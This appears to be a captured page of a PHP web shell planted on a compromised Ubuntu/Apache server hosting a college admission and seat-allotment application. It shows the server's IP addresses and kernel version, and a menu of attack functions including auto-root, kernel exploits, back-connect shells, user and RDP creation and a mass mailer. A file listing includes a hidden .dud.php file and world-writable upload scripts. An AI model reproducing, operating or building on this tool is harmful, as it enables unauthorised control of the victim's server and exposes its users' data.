Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.109.147
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
dud /
[ HOME SHELL ]
Name
Size
Permission
Action
.dud.php
3.61
KB
-rw-r--r--
MainPage.html
52.32
KB
-rwxrwxrwx
app-status.html
3.06
KB
-rwxrwxrwx
dat.json
5.03
KB
-rwxrwxrwx
ent-application.html
88.03
KB
-rwxrwxrwx
ent-application05.10.2020.html
83.65
KB
-rwxrwxrwx
forgotPassword.html
5.11
KB
-rwxrwxrwx
genRankPrio.php
894
B
-rwxrwxrwx
index.html
6.9
KB
-rwxrwxrwx
index_adm.html
5.42
KB
-rwxrwxrwx
instruction.html
10.69
KB
-rwxrwxrwx
make-payment.html
452
B
-rwxrwxrwx
mock-seat-allotment.html
608
B
-rwxrwxrwx
option-entry.html
1.54
KB
-rwxrwxrwx
pg-forgotPassword.html
4.1
KB
-rwxrwxrwx
pg-sign-up.html
7.81
KB
-rwxrwxrwx
pg_instruction.html
8.86
KB
-rwxrwxrwx
pgadm.html
67.76
KB
-rwxrwxrwx
seat-allotment.html
1.08
KB
-rwxrwxrwx
seatAllot.php
6.75
KB
-rwxrwxrwx
sign-up.html
7.95
KB
-rwxrwxrwx
support.html
4.76
KB
-rwxrwxrwx
upload_file.php
787
B
-rwxrwxrwx
upload_file_pg.php
746
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : option-entry.html
<div class="row clearfix" id="upload_doc_det"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="card"> <div class="header bg-blue"> <h2>Option Entry</h2> </div> <div class="body"> <div class="row clearfix"> <div id="uploaddetdet" class="row clearfix"> <div class="col-md-12"> <div class="col-md-12"> <div id="upddet"> <table class='table table-bordered table-striped table-upd' id="uploaddet"> <thead> <tr class="bg-cyan"> <td style="width :10%;text-align: center;">Sl. No.</td> <td style="width : 40%;text-align: center;">Degree</td> <td style="width : 35%;text-align: center;">College</td> <td style="width : 15%;text-align: center;">Priority</td> </tr> </thead> <tbody id="options"> </tbody> </table> </div> <center> <button type="button" style="font-weight: 600;font-size: 16px; margin: 10px auto;" class="btn btn-primary waves-effect btn-lg" onclick = "saveOptionEntry()">Save</button> </center> </div> </div> </div> </div> </div> </div> </div> </div>
Close